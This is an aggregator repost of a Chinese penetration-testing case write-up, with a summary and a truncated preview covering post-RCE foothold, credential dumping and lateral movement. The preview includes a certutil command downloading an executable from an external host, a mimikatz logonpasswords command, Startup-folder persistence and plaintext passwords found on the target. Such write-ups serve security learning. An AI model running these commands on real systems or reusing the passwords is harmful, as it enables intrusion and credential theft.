专栏名称: 白帽子左一
零基础也能学渗透!关注我,跟我一启开启渗透测试工程师成长计划.专注分享网络安全知识技能.
今天看啥  ›  专栏  ›  白帽子左一

某次极为顺畅的实战案例

白帽子左一  · 公众号  · 互联网安全  · 2024-06-11 12:00
    

主要观点总结

该文章描述了一次网络安全渗透过程,涉及多种技术工具和方法的运用,包括RCEshell上线、信息收集、密码获取、内网横向扫描、永恒之蓝攻击、数据库弱口令等。

关键观点总结

关键观点1: 文章概述了渗透过程的来源和背景。

文章来源于阿里云官网的一篇关于网络安全渗透的教程,内容真实,案例详细。

关键观点2: 主要技术工具和方法

文章涉及的技术包括RCEshell上线、信息收集(使用frp和mimikatz)、密码获取(使用mimikatz获取密码)、内网横向扫描、永恒之蓝攻击等。

关键观点3: 渗透过程中发现的关键信息

渗透过程中发现了海康威视综合安防管理平台存在漏洞,还有数据库弱口令问题,以及域控的存在。

关键观点4: 文章涉及的网络和设备

文章中涉及到的网络和设备主要包括Windows Server 2008 R2、Windows Server 2016、Windows 7等不同版本的Windows系统,以及海康威视综合安防管理平台等。

关键观点5: 文章末尾的声明

文章末尾强调了技术、思路和工具仅供安全为目的的学习交流使用,并提醒不得用于非法用途和盈利目的。同时,作者分享了一个知识星球平台,提供前沿漏洞、安全面试经验、SRC实战纪实等内容的分享。


文章预览

扫码领资料 获网安教程 文章来源: https: //xz.aliyun.com/t/13557 真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。 金蝶云星空RCE shell之后尝试上线(出网) certutil -urlcache -split -f http://xx.xx.xx.xx/test.exe c:\test.exe 这里exe的位置只是一个示例,正常都是在tmp目录下的 有CS的话,就上传frp 本机信息收集 上传mimikatz收集密码本 mimikatz收集密码 mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" get一个密码,乍一看还有域 administrator/@qweadmin5656 之后在翻取文件的地方,发现有个密码 HAO & ^ & 123 维权 这里因为是简单的市护网,没人应急,维权就把exe的木马文件放到启动目录下 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 内网横向 之后就是fscan的扫描 先简单的使用密码本进行横向扫描,针对445端口进行密码复用的爆破。 因为SMB密码和RDP的密码是 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览